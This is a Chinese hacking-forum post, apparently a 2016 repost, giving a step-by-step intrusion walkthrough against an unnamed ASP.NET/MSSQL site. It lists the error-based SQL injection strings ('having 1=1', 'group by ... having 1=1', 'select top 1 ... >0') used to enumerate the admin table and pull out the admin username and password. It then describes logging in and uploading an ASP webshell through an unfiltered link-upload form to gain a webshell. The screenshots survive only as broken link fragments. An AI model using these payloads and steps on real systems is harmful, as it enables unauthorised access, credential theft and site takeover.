搜索
查看: 728|回复: 0

aspx+mssql后台登陆注入拿webshell

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2016-7-1 11:02:20 | 显示全部楼层 |阅读模式
转载备份

首先测试一下是否可以注入:
[/url]

可以看到,已经出错了:
[url=http://photo.blog.sina.com.cn/showpic.html#blogid=7fe448c70101f36u&url=http://s14.sinaimg.cn/orignal/7fe448c7gdf333d565fed]



接下来利用 这个语句:a' having 1=1 --  爆出字段名:



[/url]


[url=http://photo.blog.sina.com.cn/showpic.html#blogid=7fe448c70101f36u&url=http://s15.sinaimg.cn/orignal/7fe448c7gdf334a5454fe]




可以看到已经爆出表名和字段名了:AdminUser.AdminId,再用

'group by AdminUser.AdminId having 1=1 --爆出其他字段
[/url]

用户名字段已经爆出来了:AdminUser.UserName
再用 'group by AdminUser.AdminId,AdminUser.UserName having 1=1 --爆出密码字段:AdminUser.PassWord 如下图

[url=http://photo.blog.sina.com.cn/showpic.html#blogid=7fe448c70101f36u&url=http://s14.sinaimg.cn/orignal/7fe448c7gdf33502470fd]



字段名都爆出来了,接下来就可以来爆出用户名和密码了
用 ' and (select top 1 AdminUser.UserName from AdminUser )>0 -- 爆出用户名如下:

[/url]


再用:' and (select top 1 AdminUser.PassWord from AdminUser )>0 -- 爆出密码如下:
[url=http://photo.blog.sina.com.cn/showpic.html#blogid=7fe448c70101f36u&url=http://s14.sinaimg.cn/orignal/7fe448c7gdf3377f1bcbd]


这样,账号密码就到手了,直接登录后台
[/url]

找到可以上传的地方,我这里是在友情链接》添加友情链接

[url=http://photo.blog.sina.com.cn/showpic.html#blogid=7fe448c70101f36u&url=http://s13.sinaimg.cn/orignal/7fe448c7gdf338039ab9c]


[/url]

我这里是上传一个asp大马,看到了吧,过滤不严,可以直接上传,添加成功,看一下马儿的路径:

[url=http://photo.blog.sina.com.cn/showpic.html#blogid=7fe448c70101f36u&url=http://s16.sinaimg.cn/orignal/7fe448c7gdf33812ec20f]


复制路径到游览器打开,打开就可以看到可以的马儿了。

[/url]

[url=http://photo.blog.sina.com.cn/showpic.html#blogid=7fe448c70101f36u&url=http://s8.sinaimg.cn/orignal/7fe448c7gdf338243e907]



这样,webshell就到手了。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表